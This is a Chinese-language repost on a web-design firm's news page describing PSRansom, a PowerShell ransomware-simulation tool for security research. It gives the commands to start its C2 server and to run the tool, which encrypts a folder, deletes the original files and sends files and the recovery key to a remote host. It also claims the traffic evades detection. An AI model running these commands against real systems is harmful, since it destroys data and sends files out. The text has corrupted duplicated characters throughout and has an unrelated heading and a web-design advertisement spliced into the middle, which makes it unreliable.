网络小说排行榜,辰东

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案

如何使用PSRansom進(jìn)行勒索軟件安全分析

關(guān)于PSRansom

PSRansom是一款帶有C2服務(wù)器功能的PowerShell勒索軟件模擬工具，該工具可以幫助廣大研究人員模擬針對(duì)任何操作系統(tǒng)平臺(tái)(只要安裝了PowerShell即可)的通用勒索軟件數(shù)據(jù)加密過(guò)程。在C2服務(wù)器功能的幫助下，我們甚至還可以通過(guò)HTTP從目標(biāo)設(shè)備(客戶端)中提取文件，并在服務(wù)器端接收信息。

成都創(chuàng)新互聯(lián)主要從事做網(wǎng)站、網(wǎng)站制作、網(wǎng)頁(yè)設(shè)計(jì)、企業(yè)做網(wǎng)站、公司建網(wǎng)站等業(yè)務(wù)。立足成都服務(wù)郟縣,十余年網(wǎng)站建設(shè)經(jīng)驗(yàn),價(jià)格優(yōu)惠、服務(wù)專(zhuān)業(yè),歡迎來(lái)電咨詢建站服務(wù):13518219792

客戶端和服務(wù)器端之間的通信數(shù)據(jù)都經(jīng)過(guò)了加密和編碼，因此是無(wú)法被基于流量審計(jì)的檢查工具所檢測(cè)到的。

工具要求

PowerShell 4.0或更高版本

工具下載

廣大研究人員可以使用下列命令將該項(xiàng)目源碼克隆至本地：git clone https://github.com/JoelGMSec/PSRansom

或者直接訪問(wèn)該項(xiàng)目的【??Releases頁(yè)面??】下載工具的壓縮文件。

下載完成之后，我們將拿到兩個(gè)腳本：PSRansom和C2Server。第一個(gè)將模擬勒索軟件感染，而第二個(gè)將負(fù)責(zé)恢復(fù)文件及其恢復(fù)密鑰。

工具使用

該工具的使用非常簡(jiǎn)單，我們只需要指明要加密的目錄、C2 服務(wù)器的 IP 或主機(jī)名以及接收連接的端口。

除此之外，如果我們需要發(fā)送加密文件，則需要在命令結(jié)尾添加-x參數(shù)選項(xiàng)即可。在解密的時(shí)候，只需要指明目錄和恢復(fù)密鑰即可。

工具使用樣例

首先，我們的測(cè)試場(chǎng)景定義如下：

勒索軟件將在 Windows 機(jī)器上運(yùn)行
我們要加密的文件夾位于 C:\Backup
C2 服務(wù)器將在 Kali Linux 上運(yùn)行
所有流量都將通過(guò)代理查看詳細(xì)信息

接下來(lái)，我們看看該工具提供了哪些操作選項(xiàng)：

命令和控制服務(wù)器的使用也非常簡(jiǎn)單，我們只需要指明監(jiān)聽(tīng)連接的端口和接收連接的端口即可。這里，我們使用的是80端口：

pwsh C2Server.ps1 + 80

接下來(lái)，我們將使用以下命令運(yùn)行加密和滲透：

.\PSRansom.ps1 -e directory -s ServerC2 -p port -x

此時(shí)將生成24 個(gè)字母數(shù)字字符(小寫(xiě)、大寫(xiě)和數(shù)字)的隨機(jī)密鑰，數(shù)據(jù)將以 AES256 加密，并將恢復(fù)密鑰發(fā)送到 C2 服務(wù)器。

完成后，原始文件將被刪除，僅保留加密的文件：

服務(wù)器端將接收到類(lèi)似如下圖所示的內(nèi)容：

現(xiàn)在，我們將在服務(wù)器端接收到目標(biāo)設(shè)備的信息、恢復(fù)密鑰、加密文件列表等：

許可證協(xié)議

本項(xiàng)目的開(kāi)發(fā)與發(fā)布遵循??GPL-3.0??開(kāi)源許可證協(xié)議。

項(xiàng)目地址

PSRansom：【??GitHub傳送門(mén)??】

新聞名稱(chēng)：如何使用PSRansom進(jìn)行勒索軟件安全分析
瀏覽路徑：http://m.fisionsoft.com.cn/article/djehsii.html